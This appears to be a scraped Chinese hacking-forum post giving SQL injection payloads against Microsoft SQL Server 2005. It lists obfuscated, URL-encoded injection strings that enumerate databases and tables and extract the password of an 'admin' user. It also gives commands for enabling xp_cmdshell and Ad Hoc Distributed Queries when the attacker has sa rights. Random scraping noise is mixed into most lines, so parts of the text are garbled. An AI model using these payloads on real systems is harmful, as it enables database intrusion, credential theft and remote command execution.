) s9 o! U% V [% ?/ J1 _/ `
+ @" ]7 c' ]( r* m" `
}8 T' l' |( Y[Copy to clipboard]CODE:& n- b/ v: f4 p6 k
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--( L0 G7 Z) ]6 g# k0 s# J' U
% a8 J4 x$ V, B( z* r
爆表语句,somedb部份是所要列的数据库,红色数字1累加
0 u8 c, s. P% {9 r }# V# S- w- v' j5 V- q# o( y( n
. C% m. V: g4 i; i3 v[Copy to clipboard]CODE:
' ^ l2 l. q* \0 f s$ q/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
) j3 }! p3 |- D8 C6 n! \; a0 a3 O* [* J6 f5 i* n
爆字段语句,爆表admin里user='icerover'的密码段! M: {5 h' ?/ I4 K
3 H% q: E9 e' ^$ i8 K
, D, }5 `3 c! J2 U) b4 V1 f( V[Copy to clipboard]CODE:
5 H# F. R. B3 W% E8 _**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--/ d( _8 f& _+ T) {1 y' G; c' m
2 N& l- B# g. P( n: bmssql2005默认没有开xp_cmdshell的,openrowset也不能用5 U% Q0 R0 j0 q- v0 T
如果是sa权限,可以这样来开启
6 U, B! a1 c& I8 Q# d3 I' a0 \& H开启openrowset" L3 v6 D4 ]; V3 B
& ~% z2 a* A9 K! G
U) @8 ]: q3 g2 o U[Copy to clipboard]CODE:8 N: J* _( f" @( F
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
5 e) X3 E5 o5 t/ |0 ^6 ?* z/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--4 j" \$ H3 V( _/ C
- z2 D, G3 J" M5 N# u p& ~7 i开启xp_cmdshell1 |! o" p! z- C C. B
# s; m* n; ?) P/ o6 H5 X& F1 o- \
[Copy to clipboard]CODE:0 }% o4 ?0 A# d2 j
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
9 g% V" F% b, w+ q5 h' R' D0 kEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
1 c% X; R7 ?3 y+ q% F# @7 O& n+ g( e9 {: a% |: L0 L6 y) a; B0 U) N# r" M
ok,over~~晚安) a5 P- a/ f/ T3 x6 ]- \7 @! r
|